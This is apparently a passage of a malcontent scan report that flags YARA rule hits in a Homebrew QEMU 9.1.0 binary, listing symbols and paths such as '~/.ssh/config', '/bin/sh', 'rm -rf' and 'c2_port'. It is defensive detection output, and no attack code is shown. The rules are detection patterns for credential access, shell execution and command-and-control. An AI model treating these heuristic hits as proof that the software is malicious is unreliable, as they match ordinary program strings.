[spdm_port](https://github.com/search?q=spdm_port&type=code)
[state_port](https://github.com/search?q=state_port&type=code)
[throttle_port](https://github.com/search?q=throttle_port&type=code)
[uhci_port](https://github.com/search?q=uhci_port&type=code)
[update_ip](https://github.com/search?q=update_ip&type=code)
[upstream_port](https://github.com/search?q=upstream_port&type=code)
[usb_port](https://github.com/search?q=usb_port&type=code)
[virtser_port](https://github.com/search?q=virtser_port&type=code)
[write_port](https://github.com/search?q=write_port&type=code)
[xhci_port](https://github.com/search?q=xhci_port&type=code) | +| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) | +| MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#command_and_control) | Uses terms that may reference a command and control server | [c2_port](https://github.com/search?q=c2_port&type=code) | +| MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | +| MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [~/.ssh/config](https://github.com/search?q=~%2F.ssh%2Fconfig&type=code) | +| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | +| MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | 
[evasion/indicator_blocking/vm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/indicator_blocking/vm.yara#hidden_qemu) | operates a QEMU VM | [QEMU_VFIO](https://github.com/search?q=QEMU_VFIO&type=code)
[unable to find CPU model '%s'](https://github.com/search?q=unable+to+find+CPU+model+%27%25s%27&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [qapi_free_MigrationExecCommand](https://github.com/search?q=qapi_free_MigrationExecCommand&type=code)
[visit_type_MigrationExecCommand_members](https://github.com/search?q=visit_type_MigrationExecCommand_members&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execv](https://github.com/search?q=execv&type=code) | +| MEDIUM | [exec/shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell) | executes shell | [/bin/sh](https://github.com/search?q=%2Fbin%2Fsh&type=code) | +| MEDIUM | [exec/tty/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/tty/open.yara#openpty) | finds and opens an available pseudoterminal | [openpty](https://github.com/search?q=openpty&type=code) | +| MEDIUM | [fs/attributes/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/attributes/set.yara#remove_xattr) | [set an extended file attribute value](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man2/setxattr.2.html) | [setxattr](https://github.com/search?q=setxattr&type=code) | +| MEDIUM | [fs/file/delete_forcibly](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_recursive_force) | Forcibly deletes files recursively | [rm -rf](https://github.com/search?q=rm+-rf&type=code) | +| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch event kind](https://github.com/search?q=touch+event+kind&type=code)
[touch event type](https://github.com/search?q=touch+event+type&type=code)
[touch slot number](https://github.com/search?q=touch+slot+number&type=code) | +| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/bin](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fbin&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifdown](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifdown&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifup](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifup&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu/qemu.conf](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu%2Fqemu.conf&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/libexec/qemu-bridge-helpe](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Flibexec%2Fqemu-bridge-helpe&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/icons](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Ficons&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/qemu-firmware](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Fqemu-firmware&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/var](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fvar&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/at-spi2-core/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fat-spi2-core%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/attr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fattr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/berkeley-db](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fberkeley-db&type=code)
[/home/linuxbrew/.linuxbrew/opt/binutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbinutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/bzip2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbzip2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/cairo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcairo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/capstone/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcapstone%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dbus/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdbus%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dtc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdtc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/elfutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Felfutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/expat/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fexpat%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fontconfig/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffontconfig%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freeglut/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreeglut%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freetype/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreetype%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fribidi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffribidi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/gdk-pixbuf/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgdk-pixbuf%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglib%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glslang/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglslang%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gmp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgmp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gnutls/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgnutls%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/graphite2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgraphite2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gsettings-desktop-schemas/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgsettings-desktop-schemas%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gtk](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgtk&type=code)
[/home/linuxbrew/.linuxbrew/opt/harfbuzz/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fharfbuzz%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/icu4c/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ficu4c%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/jpeg-turbo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fjpeg-turbo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/krb5/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fkrb5%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libcap-ng/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibcap-ng%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libcap/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibcap%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libdrm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibdrm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libedit/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibedit%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libepoxy/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibepoxy%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libevent/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibevent%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libffi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibffi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libfontenc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibfontenc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libice/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibice%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libidn2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibidn2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libnghttp2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibnghttp2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libnsl/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibnsl%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libpciaccess/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibpciaccess%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libslirp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibslirp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libsm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibsm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libssh/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibssh%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtasn1/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtasn1%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtiff/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtiff%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libtirpc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibtirpc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libunistring/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibunistring%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libusb/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibusb%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libva/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibva%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libvdpau/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibvdpau%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libx11/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibx11%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxau/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxau%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcb/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcb%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcrypt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcrypt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcvt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcvt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxdamage/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxdamage%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxdmcp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxdmcp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxext/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxext%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxfixes/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxfixes%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxfont2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxfont2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxinerama/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxinerama%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxkbcommon/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxkbcommon%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxkbfile/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxkbfile%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxml2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxml2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxmu/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxmu%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxrandr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxrandr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxrender/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxrender%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxshmfence/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxshmfence%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxtst/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxtst%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxv/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxv%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxxf86vm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxxf86vm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/llvm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fllvm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lm-sensors/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flm-sensors%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lz4/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flz4%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lzo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flzo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mesa-glu/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmesa-glu%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mesa/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmesa%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mpdecimal/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmpdecimal%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/nettle/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fnettle%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/openssl](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fopenssl&type=code)
[/home/linuxbrew/.linuxbrew/opt/p11-kit/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fp11-kit%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pango/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpango%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pcre2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpcre2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pixman/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpixman%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/python](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpython&type=code)
[/home/linuxbrew/.linuxbrew/opt/readline/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Freadline%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/snappy/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsnappy%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/spirv-llvm-translator/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fspirv-llvm-translator%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/spirv-tools/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fspirv-tools%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/sqlite/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsqlite%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/systemd/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsystemd%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/unbound/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Funbound%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/util-linux/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Futil-linux%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/valgrind/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fvalgrind%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/vde/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fvde%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/wayland/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fwayland%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-image/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-image%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-keysyms/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-keysyms%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-renderutil/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-renderutil%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-wm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-wm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xkbcomp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxkbcomp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xorg-server/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxorg-server%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xz/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxz%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/z3/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fz3%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/sbin/samba-dot-org-smbd](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fsbin%2Fsamba-dot-org-smbd&type=code) | +| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/perf-%d.map](https://github.com/search?q=%2Ftmp%2Fperf-%25d.map&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/block/block-gen.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fblock%2Fblock-gen.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/hw/usb/hcd-ehci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fhw%2Fusb%2Fhcd-ehci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/base.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Fbase.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/list.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Flist.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/listfile.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Flistfile.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/simple.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Fsimple.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/block/throttle-gro](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fblock%2Fthrottle-gro&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char-fd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar-fd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char-socke](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar-socke&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret.h&type=code)
